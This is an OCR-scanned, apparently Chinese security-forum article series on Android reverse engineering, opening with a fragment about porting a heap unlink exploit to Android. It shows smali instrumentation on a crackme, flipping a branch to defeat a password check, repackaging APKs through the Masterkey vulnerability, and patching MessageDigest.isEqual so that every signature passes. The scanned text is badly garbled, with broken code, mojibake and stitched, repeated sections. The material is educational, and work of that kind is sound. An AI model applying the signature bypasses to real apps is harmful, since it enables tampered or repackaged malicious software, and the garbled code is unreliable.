uid=0(root) gid=0(root) context=u:r:shell:s0 
ls 


unlink demo 





ps : 完整 的 利用 代码 和 涉及 到 的 工具 可 以 在 我 的 github 下 载 

将 how2heap 中 unsafe_unlink.c 修 改 为 32 位 后 在 Android 模 拟 器 上 是 运行 不 成 功 的 ， 通 过 对 比 
Linux 和 Android unlink 时 的 源码 发 现 ， 在 Android 中 多 了 一 条 检测 条 件 : ok address(M, F) > 
就 是 检查 F 地 址 的 合法 性 ， 因 为 malloc/free 绝 对 不 会 向 一 个 静态 地 址 写 数 据 。 于 是 将 

unsafe unlink.c 中 uint32_t* pointer_vector[10]; 改 为 


uint32 t** pointer vector; pointer_vector=(uint32_t**)malloc(10*sizeof(uint32_t)); 就 可 


以 在 Android 上 跑 通 了 。 


https://github.com/shellphish/how2heap/blob/master/unsafe unlink.c 
http://code.woboq.org/userspace/glibc/malloc/malloc.c.html 
http://androidxref.com/5.1.1 r6/xref/bionic/libc/upstream-dlmalloc/malloc.c 
https://sploitfun.wordpress.com/2015/02/10/understanding-glibc-malloc/ 


Android 调试 工具 


原文 by RAK 


0x00 序 


随 着 移动 安全 越 来 越 火 ， 各 种 调试 工具 也 都 层出不穷 ， 但 因为 环境 和 需求 的 不 同 ， 并 没有 工 
具 是 万 能 的 。 另 外 工具 是 死 的 ， 人 是 活 的 ， 如 果 能 摘 懂 工具 的 原理 再 结合 上 自身 的 经 验 ， 你 
也 可 以 创造 出 属于 自己 的 调试 武器 。 因 此 ， 笔 者 将 会 在 这 一 系列 文章 中 分 享 一 些 自己 经 常用 
或 原创 的 调试 工具 以 及 手段 ， 布 望 能 对 国内 移动 安全 的 研究 起 到 一 些 催化 剂 的 作用 。 


0x01 长 生 剑 


长 生 剑 是 把 神奇 的 人 环 ， 为 白玉 京 所 配 ， 剑 名 取 意 来 自 于 李白 的 诗 :“ 仙 人 抚 我 顶 ， 结 发 受 长 
生 。” 长 生 剑 是 七 种 武器 系列 的 第 一 种 武器 ， 而 笔者 接 下 来 所 要 介绍 的 调试 方法 也 是 我 最 早 学 
习 的 调试 方法 ， 并 且 这 种 方法 就 像 长 生 剑 一 样 ， 简 单 并 一 直 都 有 很 好 的 效果 。 这 种 方法 就 是 
Smali Instrumentation， 又 称 Smali 插 桩 。 使 用 这 种 方法 最 大 的 好 处 就 是 不 需要 对 手机 进行 
root， 不 需要 指定 android 的 版 本 ， 如 果 结 合 一 些 tricks 的 话 还 会 有 意 想不到 的 效果 。 


0x02 Smali/baksmali 


做 安 车 逆向 最 先 接 触 到 的 东西 肯定 就 是 smali 语 言 7 了 ，smali 最 早 是 由 Jasmin 提 出 ， 随 后 
jesusfreke 开 发 了 最 有 名 QUI Hep ihe 其 发 扬 光 大 ， 几 乎 dex 上 所 有 的 静态 分 析 工 
具 都 是 在 这 个 项 目的 基础 上 建立 的 。 什 么 ?了 你 没 听 说 过 smali 和 baksmali? 你 只 用 过 Apktool? 
如 果 你 仔细 阅读 了 Apktool 官 网 的 说 明 你 就 全 发 现 ，Apktool 其 实 只 是 一 个 将 各 种 工具 结合 起 来 
的 懒 人 工具 而 已 。 并 且 笔 者 建议 从 现在 起 就 抛弃 Apktool 吧 。 原 因 如 下 : 首先 ，Apktool 更 新 并 
没有 smali/baksmali 频 繁 ，smaliybaksmali 更 新 后 要 过 非常 久 的 时 间 才 会 合并 到 Apktool 中 ， 在 
这 之 前 你 可 能 需要 忍受 很 多 诡异 的 bug。 其 次 ，Apktool 在 反 编 译 或 者 重 打包 dex 的 时 候 ， 如 果 
发 生 错误 ， 仅 仅 只 会 提供 错误 的 exception 信 息 而 已 ， 但 如 果 你 使 用 smalijbaksmali， 工 具 会 告 
诉 你 具体 的 出 错 原因 ， 会 对 重 打 包 后 的 调试 有 巨大 的 帮助 。 最 后 ， 很 多 apk 为 了 对 付 反 调试 会 
在 资源 文件 中 加 入 很 多 junk code 从 而 使 得 Apktool 的 解析 前 溃 看， 造成 反 编 译 失败 或 者 无 法 重 
打包 。 但 如 果 你 仅 对 classes.dex 操 作 就 不 会 有 这 些 问题 了 。 


学 习 smali 最 好 的 方法 就 是 自己 先 用 java 写 好 程序 ， 再 用 baksmali 转 换 成 smali 语 句 ， 然 后 对 昭 
学 习 。 比 如 下 面 就 是 java 代 码 和 用 baksmali 反 编译 过 后 的 smali 文 件 的 对 照 分 析 。 


MZLog 类 主要 是 用 Log.d() 输 出 调试 信息 ，Java 代 码 如 下 : 


Smali Instrumentation 


package com.mzheng; 
public class MZLog { 
public static void Log(String tag, String msg) 
Log.d(tag, msg); 


public static void Log(Object someObj) 


t 
Log("mzheng", someObj.toString()); 


public static void Log(Object[] someObj) 
t 


j 


Log("mzheng",Arrays.toString(someObj)); 


对 应 的 Smali 代 码 如 下 : 
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.class public Lcom/mzheng/MZLog; # class 的 名 字 
.super Ljava/lang/Object; # 这 个 类 继承 的 对 象 
.source "MZLog.java" # java 的 文件 名 


# direct methods # 直 接 方 法 
.method public constructor <init>()V # 这 是 Class 的 构造 函数 实现 
.registers 1 # 这 个 方法 所 使 用 的 寄存 器 数量 


.prologue # prologue 并 没有 什么 用 

.line 7 # 行 号 
invoke-direct {p0}, Ljava/lang/Object;-><init>()V # 调 用 Object 的 构造 方法 ，p9 相 当 于 "this" 指 
4 

return-void # 返 回 空 
,end method 


.method public static Log(Ljava/lang/Object;)V # Log(0bject ) 的 方法 实现 
.registers 3 


.param pO, "someObj" 4 Ljava/lang/Object; 参数 信息 
.prologue 
.line 16 


const-string vO, "mzheng"  # 给 v0 赋值 "mzheng” 


invoke-virtual {p0}, Ljava/lang/Object; ->toString()Ljava/lang/String; # 调 用 toString 
Qd 


move-result-object v1 # 将 toString() 的 结果 保存 在 v1i 


invoke-static (v0, v1), Lcom/mzheng/MZLog; -»Log(Ljava/lang/String;Ljava/lang/Strin 
g;)V # 调 用 MZLog 的 另 一 个 Log 函 数 ， 参 数 是 vV9 和 V1 


.line 17 
return-void 
.end method 


.method public static Log(Ljava/lang/String;Ljava/lang/String; )V #Log(String, String) 4 
方法 实现 
.registers 2 


.param pO, "tag" # Ljava/lang/String; 
.param pi, "msg" # Ljava/lang/String; 
.prologue 
.line 11 


invoke-static (pO, p1}, Landroid/util/Log;-»-d(Ljava/lang/String;Ljava/lang/String; 
)I # 调 用 android API 里 的 Log 有 函数 实现 Log 功 能 


.line 12 
return-void 
.end method 


.method public static Log([Ljava/lang/Object;)V #Log(Object[]) BX “[' 符 号 是 数组 的 意思 
.registers 3 
.param pO, "someObj" # [Ljava/lang/Object; 


.prologue 
.line 21 
const-string vO, "mzheng" 


invoke-static {p0}, Ljava/util/Arrays; ->toString([Ljava/lang/Object; )Ljava/lang/St 
ring;  # 将 Object 数组 转换 为 String 


move-result-object v1 # 转 换 后 的 结果 存在 V1 中 


invoke-static {vO, v1}, Lcom/mzheng/MZLog; ->Log(Ljava/lang/String;Ljava/lang/Strin 
g;)V #AMLog(String, String) 


.line 22 
return-void 
.end method 


最 后 简单 介绍 一 下 smali 常 用 的 数据 类 型 : 


- int 

- long (64 bits) 

- float 

- double (64 bits) 


DTOHOWWN< 
Oo 
E 
m 
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0x03 Smali 插 桩 


如 果 仅 仅 用 Smali 来 分 析 代 码 ， 效 果 其 实 不 如 用 dex2jar 和 jd-gui 更 直观 ， 毕 竞 看 反 编译 的 java 
代码 要 更 容易 一 些 。 但 Smali 强 大 之 处 就 是 可 以 随心 所 和 欲 的 进行 插 桩 操作 。 何 为 播 桩 ， 引 用 一 
下 wiki 的 解释 : 程序 插 桩 ， 最 早 是 由 J.C. Huang 教授 提出 的 ， 它 是 在 保证 被 测 程序 原 有 人 逻辑 
完整 性 的 基础 上 在 程序 中 插入 一 些 探 针 (又 称 为 “探测 仪 ”) ， 通 过 探 针 的 执行 并 抛 出 程序 运行 
的 特征 数据 ， 通 过 对 这 些 数据 的 分 析 ， 可 以 获得 程序 的 控制 流 和 数据 流 信息 ， 进 而 得 到 逻辑 
禾 盖 等 动态 信息 ， 从 而 实现 测试 目的 的 方法 。 下 面 我 就 来 结合 一 个 例子 来 讲解 一 下 何如 进行 
smali 插 桩 。 


测试 程序 是 一 个 简单 的 crackme (图 1)。 输 入 密码 ， 然 后 点 击 check， 如 果 密 码 正 确 会 输出 
yes， 否 则 输出 no。 


? um 


Š! crackmel 





password 
check 
WooYu un 知识 库 
= am mum] 


图 1 Crackme1 的 界面 


首先 我 们 对 crackme 这 o ， 然 后 反 编 译 。 我 们 会 在 MainActivity 中 看 到 一 
getkey(String,int) & 2% ° 2&4 TARRE 复杂 ， 我 们 暂时 不 管 。 我 们 首先 分 析 一 下 点 
button 后 的 逻辑 。 我 们 o 2 i it getkey("mrkxqcroxqtskx",42) x tH H IE hg RA > A 
后 与 我 们 输入 的 密码 进行 比较 ，java 代 码 如 下 : 


public void onClick(View arg0) { 

String str = editTextO.getText().toString(); 

if (str.equals(getkey("mrkxqcroxqtskx",42))) 
{ 


Toast .makeText(MainActivity.this,"Yes!", Toast.LENGTH LONG).show(); 
} 


else 


{ 
Toast.makeText(MainActivity.this, No!", Toast.LENGTH LONG).show(); 
5 


这 时 候 就 是 smali 插 桩 大 显 身手 的 时 候 了 ， 我 们 可 以 通过 插 桩 直接 获取 
getkey("mrkxqcroxqtskx",42) 这 个 函数 的 返回 值 ， 然 后 Log 出 来 。 这 样 我 们 就 不 需要 研究 
getkey 这 个 函数 的 实现 了 。 具 体 过 程 如 下 : 


1 首先 解压 apk 然 后 用 baksmali 进 行 反 编译 。 


unzip crackme1.apk 
java -jar baksmali-2.0.3.jar classes.dex 


2 oo pr smalix #444 Jl $lcom/mzheng Hl xx F > 3x 4 x EA 3/4 LOG $ 
数 ， 分 别 可 以 输出 String 的 值 ，Object 的 值 和 Object 数组 的 值 。 注 意 ， 如 果 原 程序 中 没有 
Eun. 这 个 目录 ， 你 需要 自己 用 mkdir 创 建 一 下 。 找 贝 完 后 ， 目 录 结 构 如 下 : 


com 
L—mzheng 
| MZLog.smali 


—crackme1 
BuildConfig.smali 
MainActivity$1.smali 
MainActivity.smali 
R$attr.smali 
R$dimen.smali 
R$drawable.smali 
R$id.smali 
R$layout.smali 
R$menu.smali 
R$string.smali 
R$style.smali 
R.smali 


3 用 文本 编辑 器 打开 MainActivity$1.smali 文 件 进 行 插 桩 。 为 什么 是 MainActivity$1.smali 而 不 是 
MainActivity.smali% ? 因为 主要 的 判 lee tee ONIAES tener dem E ， 而 这 个 类 是 
MainActivity 的 一 个 内 部 类 ， 同 时 我 们 在 实现 的 时 候 也 没有 给 这 个 类 声明 具体 的 名 字 ， 所 以 这 

个 类 用 $1 表示 。 加 入 MZLog.smali 这 个 文件 后 ， 我 们 只 需要 在 MainActivity$1.smali 的 第 71 行 
后 面 加 上 一 行 代码 ，invoke-static (v1), Lcom/mzheng/MZLog;->Log(Ljava/lang/Object;)V > 
就 可 以 输出 getkey 的 值 了 。|nvoke 是 方法 调用 的 指令 ， 因 为 我 们 要 调用 的 类 是 静态 方法 ， 所 以 
使 用 invoke-static。 如 果 是 非 静 态 方法 的 话 ， 第 一 个 参数 应 该 是 该 方法 的 实例 ， 然 后 依次 是 各 
个 参数 。 具 体 插入 情况 如 下 


const-string v1, "mrkxqcroxqtskx" 
const/16 v2, 0x2a 


4 invokes: Lcom/mzheng/crackmei1/MainActivity; ->getkey(Ljava/lang/String;1I)Ljava/lang/S 
tring; 


invoke-static (vi, v2}, Lcom/mzheng/crackme1/MainActivity; ->access$0(Ljava/lang/String 
;l1)Ljava/lang/String; 


move-result-object v1 

THHHHHHHHHHHHHHHHHHHHHHHHHHHHHE begin EHBHHBHHBHHHHHHHHHHHHHHHHHHHNH E 
invoke-static {v1}, Lcom/mzheng/MZLog; ->Log(Ljava/lang/Object; )V 
THHHHHHHHHHHHHHHHHHHHHHHHHHHHHE end THHSRHHHBIBHBHHHHHHHHHBHHHHHHHH A 
invoke-virtual {v0, vi}, Ljava/lang/String; ->equals(Ljava/lang/Object; )Z 


move-result v1 


4 maa dea ay smalix fF > Ježi #4 i£ f classes.dex# & # S classes.dex * /4 
后 再 用 signapk.jar 对 apk 进 行 签 名 。 几 条 关键 指令 如 下 : 


java -jar smali.jar out 
java -jar signapk.jar testkey.x509.pem testkey.pk8 update.apk update_signed.apk 


5 安装 程序 到 android， 随 便 输 入 点 啥 ， 然 后 点 击 Check 按 钮 ， 随 后 在 logcat 中 就 可 以 看 到 
getkey("mrkxqcroxqtskx",42)3x A £& Zi $5 3x m4 T (E12) » 


Application Tag Text 


com.mzheng.crackmel mzheng cung ana 
rops.Wooyun.org 


图 2 通过 logcat 获 取 getkey 的 返回 值 


0x03 Smali 修 改 


通过 Smali/baksmali 工 具 ， 我 们 不 光 可 以 插 桩 ， 还 可 以 修改 apk 的 逻辑 。 几 个 需要 注意 点 如 
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1. if 条 件 判 断 以 及 跳 转 语 句 


在 smali 中 最 常见 的 就 是 i 这 个 条 件 判 断 跳 转 语句 了 ， 这 个 判断 一 共有 12 条 指令 


if-eq vA, VB, cond ** 如 果 VA 等 于 vB 则 跳 转 到 cond_**。 相 当 于 if (vA==vB) 
if-ne vA, VB, cond ** 如 果 VA 不 等 于 vB 则 跳 转 到 cond_**。 相 当 于 if (vA!=vB) 
if-lt vA, VB, cond ** 如 果 VA 小 于 vB 则 跳 转 到 cond_**。 相 当 于 if (vA<vB) 
if-le vA, VB, cond_** 如 果 VA 小 于 等 于 vB 则 跳 转 到 cond_**。 相 当 于 if (vA<=vB) 
if-gt vA, VB, cond ** 如 果 VA 大 于 VB 则 跳 转 到 cond_**。 相 当 于 if (vA>vB) 
if-ge vA, VB, cond ** 如 果 VA 大 于 等 于 vB 则 跳 转 到 cond_**。 相 当 于 if (vA>=vB) 
if-egz vA, :cond ** 如 果 VA 等 于 90 则 跳 转 到 :cond_** 相当 于 if (VA==0) 
if-nez vA, :cond ** 如 果 VA 不 等 于 0 则 跳 转 到 :cond_** 相 当 于 if (VA!=0) 
if-ltz vA, :cond_** 如 果 VA 小 于 0 则 跳 转 到 :cond_** 相 当 于 if (VA<0) 

if-lez vA, :cond ** 如 果 VA 小 于 等 于 0 则 跳 转 到 :cond_** 相 当 于 if (VA<=0) 
if-gtz vA, :cond ** 如 果 VA 大 于 9 则 跳 转 到 :cond_** 相 当 于 if (VA>0) 

if-gez vA, :cond ** 如 果 VA 大 于 等 于 0 则 跳 转 到 :cond_** 相 当 于 if (VA>=0) 


比如 我 们 在 crackme1 里 判断 密码 是 否 正确 的 Smali 代 码 段 : 


invoke-virtual {v0, vi}, Ljava/lang/String; ->equals(Ljava/lang/Object; )Z 
move-result v1 
if-eqz v1, :cond 25 # if (v1==0) 


iget-object v1, p0, Lcom/mzheng/crackme1/MainActivity$1; ->this$0:Lcom/mzheng/crackme1/ 
MainActivity; 


const-string v2, "Yes!" 


invoke-static (vi, v2, v3}, Landroid/widget/Toast; ->makeText(Landroid/content/Context; 
Ljava/lang/CharSequence; I)Landroid/widget/Toast; 


move-result-object v1 

invoke-virtual (vij, Landroid/widget/Toast; ->show()V 

:cond 25 

iget-object v1, p0, Lcom/mzheng/crackme1/MainActivity$1; -»this$0:Lcom/mzheng/crackme1/ 
MainActivity; 


const-string v2, "No!" 


invoke-static (v1, v2, v3}, Landroid/widget/Toast; ->makeText(Landroid/content/Context; 
Ljava/lang/CharSequence; I)Landroid/widget/Toast; 


move-result-object v1 


invoke-virtual (vij, Landroid/widget/Toast; ->show()V 


如 果 我 们 不 关心 密码 内 容 ， 只 是 希望 程序 输出 ”yes” 的 话 。 我 们 可 以 把 if-eqz v1, :cond 252 X, 
if-nez v1, :cond 25。 这 样 逮 辑 就 变 为 : 当 输 错 密码 的 时 候 ， 程 序 反而 会 输出 ”yes” 


2. FA R 


Penang 件 很 重要 的 事情 就 是 要 注意 寄存 器 。 如 果 乱 用 寄存 器 的 话 可 能 会 导致 程序 崩 
。 每 个 方法 开头 声明 了 registers 的 数量 ， 这 个 数量 是 参数 和 本 地 变量 总 和 。 参 数 统一 用 P 表 
示 。 如 果 是 非 静 态 方法 p0 代 表 this，p1-pN 代 表 各 个 和 参数。 如 果 是 静态 方法 的 话 ，p0-pN 代 表 
各 个 参数 。 本 地 变量 统一 用 Vv 表示 。 如 果 想 要 增加 的 新 的 本 地 变量 ， 需 要 在 方法 开头 的 
registers 数 量 上 增加 相应 的 数值 。 


Be SN 


比如 下 面 这 个 方法 : 


.method public constructor <init>()V 
.registers 1 


.prologue 
.line 7 
invoke-direct {p0}, Ljava/lang/Object; -><init>()V 


return-void 
.end method 


因为 这 不 是 静态 方法 ， 所 以 p0 代 表 this。 如 果 想 要 增加 一 个 新 的 本 地 变量 ， 比 如 y0。 就 需要 
把 .registers 1 改 为 .registers 2。 


3. 给 原 程序 增加 大 量 逻 辑 的 办 法 


我 非常 不 建议 在 程序 原 有 的 方法 上 增加 大 量 逻 辑 ， 这 样 可 能 会 出 现 很 多 寄存 器 方面 的 错误 导 
致 编译 失败 。 上 比较 好 的 方法 是 : 把 想 要 增加 的 逻辑 先 用 java 写 成 一 个 apk， 然 后 把 这 个 apk 反 
编译 成 smali 文 件 ， 随 后 把 反 编译 后 的 这 部 分 逻辑 的 smali 文 件 插入 到 目标 程序 的 smali 文 件 夹 
中 ， 然 后 再 在 原来 的 方法 上 采用 invoke 的 方式 调用 新 加 入 的 逻辑 。 这 样 的 话 不管 加 入 再 多 的 逻 
辑 ， 也 只 是 修改 了 原 程序 的 几 行 代码 而 已 。 这 个 思路 也 是 很 多 重 打 包 病 毒 惯 用 的 伎俩 ， 确 实 
非常 方便 好 用 。 


0x04 APK 签 名 Tricks 


当 我 们 在 实战 中 ， 有 时 会 碰 到 某 些 apk 在 内 部 实现 了 自己 的 签名 检查 。 这 次 我 们 介绍 的 Smali 

Instrumentation 方 法 因为 需要 重 打包 ， 所 以 会 改变 原 有 的 签名 。 当 然 ， 你 可 以 通过 修改 apk 把 
签名 检查 的 逻辑 删 掉 ， 但 这 又 费时 又 费力 。 笔 者 在 这 里 简单 介绍 两 种 非常 方便 的 方法 来 解决 

签名 检查 问题 。 


1. Masterkey 


Masterkey 汤 洞 一 共有 三 个 ， 可 以 影响 android 4.4 以 下 版 本 。 利 用 这 个 漏洞 ， 我 们 可 以 插入 新 
的 classes.dex 替 换 掉 原 有 的 classes.dex 而 不 需要 对 apk 本 身 进行 重新 签名 。 如 果 apk 本 身 有 签 
名 校 验 逻辑 的 话 ， 利 用 这 个 漏洞 来 进行 Smali Instrumentation 简直 再 好 不 过 了 。 首 先 ， 你 需要 
一 个 android 4.4 以 下 版 本 的 虚拟 机 或 者 丨 机 ， 然 后 再 使 用 一 个 masterkey 利 用 工具 对 apk 进 行 
exploit 即 可 。 工 具 下 载 地 址 在 文章 最 后 ， 使 用 的 命令 如 下 : 


java -jar AndroidMasterKeys.jar -a orig.apk -z moddedClassesDex.zip -o out.apk orig.apk 
原本 的 apk 文 件 ，moddedClassesDex.zip 是 修改 后 的 classes.dex 并 压缩 成 zip 文 件 ，out.apk 就 
是 利用 Masterkey 漏 洞 生成 的 新 的 apk 文 件 。 如 果 成 功 的 话 用 rar 打 开 文 件 会 看 到 两 个 
classes.dex ° 








六 小 ”压缩 后 大 小 ”类 型 


——  Á——— 


49 META-INF 

res ain 

|. | AndroidManifest.xml 1,712 646 XML 文件 
|_| classes.dex 449 804 196,808 DEX 文件 
|_| classes.dex 557,312 191,076 DEX 文件 
|_| resources.arsc 2,596 dn 3f. vA RS rere 


图 3 Masterkey 生 成 的 apk 文 件 有 两 个 classes.dex 文 件 


通过 masterkey 打 包 后 的 apk 文 件 签名 并 不 会 有 任何 变化 ， 这 样 也 就 不 用 担心 签名 校 验 问题 
了 。 


2. 自足 义 ROM 


签名 的 判断 其 实 是 调用 了 android 系 统 密码 库 的 函数 ， 如 果 我 们 可 以 自己 定制 ROM 的 话 ， 只 需 
要 修改 AOSP 源 码 路 径 下 的 libcore\luni\src\main\java\java\security\MessageDigest.java X 
件 。 将 isEqual 亟 数 中 的 判断 语句 注释 掉 : 


public static boolean isEqual(byte[] digesta, byte[] digestb) { 
if (digesta.length != digestb.length) { 
return false; 


} 
JL for (int i = 0; i « digesta.length; i++) ( 
VA if (digesta[i] != digestb[i]) { 
// return false; 
VA } 
// } 


returm ues 


这 样 的 话 ， 如 果 在 你 自 定 义 的 ROM 上 运行 apk， 无 论 你 怎么 修改 classes.dex 文 件 ， 都 不 需要 
关心 签名 问题 了 ， 系 统 会 永远 返回 签名 正确 的 。 


0x05 小 结 


虽然 现在 越 来 越 多 的 apk 开 始 使 用 so 文件 进行 逮 辑 处 理 和 加 国 ，android 4.4 也 加 入 art 运 行 环 
境 ， 但 dalvik 永 远 是 android 最 经 典 的 东西 。 如 果 想 要 学 好 android 逆 向 ， 一 定 要 把 这 部 分 知识 
学 好 。 并 且 把 smali 研 究 透 彻 以 后 ， 会 对 我 们 以 后 要 讲 的 自 定义 dalvik 庶 拟 机 有 很 大 帮助 。 另 外 
文章 中 所 有 提 到 的 代码 和 工具 都 可 以 在 我 的 github 下 载 到 ， 地 址 是 : 
https://github.com/zhengmin1989/TheSevenWeapons 
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https://bluebox.com/technical/uncovering-android-master-key-that-makes-99-of-devices- 
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https://github.com/Fuzion24/AndroidZipArbitrage 


Min Zheng, Patrick P. C. Lee, John C. S. Lui. "ADAM: An Automatic and Extensible Platform 
to Stress Test Android Anti-Virus Systems", DIMVA 2012 


原文 by RAK 


0x00 序 


随 着 移动 安全 越 来 越 火 ， 各 种 调试 工具 也 都 层出不穷 ， 但 因为 环境 和 需求 的 不 同 ， 并 没有 工 
具 是 万 能 的 。 另 外 工具 是 死 的 ， 人 是 活 的， 如 果 能 搞 懂 工具 的 原理 再 结合 上 自身 的 经 验 ， 你 
也 可 以 创造 出 属于 自己 的 调试 武器 。 因 此 ， 笔 者 将 会 在 这 一 系列 文章 中 分 享 一 些 自己 经 常用 
或 原创 的 调试 工具 以 及 手段 ， 布 望 能 对 国内 移动 安全 的 研究 起 到 一 些 催化 剂 的 作用 。 


0x01 3L 241] 


XT EAEGUEIAAGGR4RG PHP RRA AXCDq 3SLRGUE A o CAKA” HRA 
无 边 。 据 说 ， 孔 管 钥 发 动 之 时 ， 瞳 器 四 射 ， 有 如 孔 管 开 屏 ， 辉 煌 灿烂 ， 而 就 在 敌人 目眩 神 迷 
ZER EARLE o A50) 3t daz fq X- 83 48 sy. ! 所 以 说 安 卓 动态 调试 七 种 武器 中 
的 孔 管 钥 非 Ida 英 属 。 因 为 lda 太 有 名 了 ， 相 应 的 教程 也 是 漫天 飞 ， 但 很 多 并 不 是 安 卓 相关 的 内 
容 ， 所 以 笔者 决定 将 一 些 经 典 的 安 卓 调试 技巧 总 结 归纳 一 下 。 因 为 篇 幅 原 因 ， 笔 者 并 不 能 保 
证 本 文 能 够 覆盖 到 ida 调 试 的 方方面面 ， 看 官 如 有 兴趣 可 以 再 继续 深入 研究 学 习 。 


0x02 ZRIN BA Y 74 


在 android 调 试 中 ， 你 会 经 常见 到 这 种 类 型 的 函数 : 
v5 = (x(int ( fastcall **)(int, int, DWORD))(*€_DWORD *)u3 + 676))(u3, v4, 8); 


首先 是 一 个 指针 加 上 一 个 数字 ， 上 比如 v3+676。 然 后 将 这 个 地 址 作为 一 个 方法 指针 进行 方法 调 
用 ， 并 且 第 一 个 参数 就 是 指针 自己 ， 比 如 (V3+676)(v3...)。 这 实际 上 就 是 我 们 在 JN| 里 经 常用 
到 的 JNIEnv 方 法 。 因 为 lda 并 不 会 自动 的 对 这 些 方法 进行 识别 ， 所 以 当 我 们 对 so 文件 进行 调试 
的 时 候 经 常会 见 到 却 搞 不 清楚 这 个 函数 究竟 在 干什么 ， 因 为 这 个 函数 实在 是 太 抽 象 了 。 解 决 
方法 非常 简单 ， 只 需要 对 JNIEnv 指 针 做 一 个 类 型 转换 即 可 。 比 如 说 上 面 提 到 v3 指 针 ， 我 们 选 
中 后 按 一 下 "y" 键 ， 然 后 将 类 型 声明 为 "JNIEnv*”。 


Please enter a string 





Please enter the type declaration JNIEnv+| 





随后 IDA 就 会 自动 查找 对 应 的 方法 并 且 显 示 出 来 了 : 
v5 = ((int (_ fastcall *)(JNIEnu *, int, _DWORD))(#03)->GetStringUTFChars)(03, v4, 8); 


U 


是 不 是 瞬间 清晰 了 很 多 ?另外 有 人 ( 貌似 是 看 雪 论 坛 上 的 ) 还 总 结 了 所 有 JNIEnv 方 法 对 应 的 
数字 ， 地 址 以 及 方法 声明 : 


672 GetStrinsUTFLensth jsize ()( JNIEnv*, jstring ) 
676 feetstringUIFChars ]const chart (*)( JNIEnv*, jstring, jboolean* ) 


680 ReleaseStringUTFChars void ()( JNIEnv*, jstring, const char* ) 
684 GetdrrayLength jsize (GO (C JNIEnv*, jarray ) 
688 | NewObjectàrray jobjectarray ()( JNIEnv*, jsize, jclass, jobject ) 


有 兴趣 的 同学 可 以 去 我 的 github 下 载 。 


0x03 调试 .init_array 和 JNI _ OnLoad 


我 们 知道 so 文件 在 被 加 载 的 时 候 会 首先 执行 .init_array 中 的 函数 ， 然 后 再 执行 JN|_OnLoad() 函 
数 。JNI_Onload() 蜀 数 因为 有 符号 表 所 以 非 党 容易 找到 ， 但 是 .init_array 里 的 元 数 需要 自己 去 
找 一 下 。 首 先 打开 view ->Open subviews->Segments。 然 后 点 击 .init.array 就 可 以 看 

到 .init_array 中 的 函数 了 。 


[ View | Debugger Options Windows Help 











Open subviews ”| 团 Quick view Ctrl+1 
Graphs » 
abaa k Disassembly 
Calculator. 2 Proximity browser 
Full screen 回 Hex dump 
i | Graph Overdew Decompile a function F4 
: D il Ctrl - FA 
[e Recent scripts Alt+F9 BR ares ey a a 
; Pseudocode F5 
(& Database snapshot manager... Ctrl - Shift T 
: : E] Exports 
Print segment registers Ctrl+Space 
| I t 
d Print internal flags F posti 
Names Shift+F4 
= Hide Ctrl+Numpad+- Functions Shift +F3 
de Unhide Ctrl+Numpad++ 图 Strings Shift+F12 
eu Hide all 
$ Unhide all E3 
XK Delete hidden area 
; a Select 
Setup hidden items... sea 





| Name start 
| [45] .plt 000010A8 
| |45| text 00001164 
| |45| .rodata 00004450 
| |45| .ARM.extab 00004564 
| |45| fini arra 00005E84 
[E init arra 





.got 00005F94 


| ($5 

| |45| ,data 00006000 
| 43) „bss 00006290 
| |45| extern 00006390 


| |45| abs 000064F8 


-init_array:66665E8C ; Segment type 


: Pure data 
.init array:888805ESC AREA .init array, DATA 
-init array: 88885ESC ; ORG 8x5ESC 
-init_array:66665E8C DCD sub_2378 
-init_array:66665E96 DCB 8 
.init array:88885E91 DCB 8 
.init array:88885E92 DCB 8 
.init array:88885E93 DCB 8 


但 一 般 当 我 们 使 用 ida 进 行 attach 的 时 候 ，.init arrayfe JNI Onload() 早 已 经 执行 完毕 了 ， 根 本 
来 不 急 调 试 。 这 时 候 我 们 可 以 使 用 jdb 这 个 工具 来 解决 ， 这 个 工具 是 安装 完 jdk 以 后 自 带 的 ， 可 
以 在 jdk 的 bin 目 录 下 找到 。 在 这 里 我 们 使 用 阿里 移动 安全 挑战 赛 2014 的 第 二 题 作 为 例子 讲解 一 


下 如 何 调试 JNL_OnLoad() ° 


打开 程序 后 ， 样 的 : 


当 Bob 市 领 银河 飞行 队 赶 到 时 3 Tel rez ES, 
驾驶 员 在 坠落 前 启动 了 自 毁 程序 ， 飞 碟 中 的 一 切 已 


hada ME ERRE DEN. 但 需要 开机 密码 。 





我 们 的 目标 就 是 获取 到 密码 。 使 用 ida 反 编译 一 下 so 文件 会 看 到 我 们 输入 后 的 密码 会 和 
off 628c 这 个 指针 指向 的 字符 串 进 行 比较 。 


v6 = off 628€; 
while ( 1 ) 
i 
u7 = (unsigned q— int8)*uó; 
if ( v7 t= *€ BYTE *)u5 ) 
break; 
*tuó; 
*tub5; 
v8 = 1; 
if ( tu7 ) 
return o9; 


> 


return 8; 
于 是 我 们 查看 off 628c 这 个 地 址 对 应 的 指针 ， 发 现 对 应 的 字符 串 是 "wojiushidaan”。 


-data:6660628C off 628C DCD aWojiushidaan 
-rodata: 66604450 aWojiushidaan DCB “wojiushidaan",6 


于 是 我 们 把 这 个 密码 输入 一 下 ， 发 现 密码 错误 。 看 样子 so 文件 在 加 载 的 时 候 对 密码 字符 串 进 
行 了 动态 修改 。 既 然 动态 修改 了 那 我 们 用 ida 动 态 调试 一 下 好 了 ， 我 们 打开 程序 ， 然 后 再 用 ida 
attach 一 下 ， 发 现 程序 直接 闪 退 了 ，iqda 那 边 也 没有 任何 有 用 信息 。 原 来 这 就 是 自 毁 程序 的 意 
思 啊 。 既 然 如 此 我 们 动态 调试 一 下 JNI_OnLoad() 来 看 一 下 程序 究竟 做 了 什么 吧 。 步 又 如 下 : 


1 ddms 


一 定 要 打开 ddms， 否 则 调试 端口 是 关闭 的 ， 就 无 法 在 程序 刚 开 始 的 暂停 了 。 我 之 前 不 知道 要 
打开 ddms 才 能 用 jdb， 还 以 为 android 系 统 或 者 sdk 出 问题 了 ， 重 装 好 几 次 。 汗 。 


2 adb push androidserver /data/local/tmp/ 


adb shell 

su 

chmod 777 /data/local/tmp/androidserver 
/data/local/tmp/androidserver 


这 里 我 们 把 ida 的 androidserver push 到 手机 上 ， 并 以 root 身 份 执行 。 
3 adb forward tcp:23946 tcp:23946 

将 ida 的 调试 端口 进行 转发 ， 这 样 pc 端 的 ida 才 能 连接 手机 。 

4 adb shell am start -D -n com.yaotong.crackme/.MainActivity 


这 里 我 们 以 debug 模 式 启 动 程序 。 程 序 会 出 现 waiting for debugger 的 调试 界面 。 


A Waiting For Debugger 


Application 自 毁 程序 密码 
(process 
com.yaotong.crackme) is 
waiting for the debugger to 
attach. 


Force Close 





5 ida attach target app 
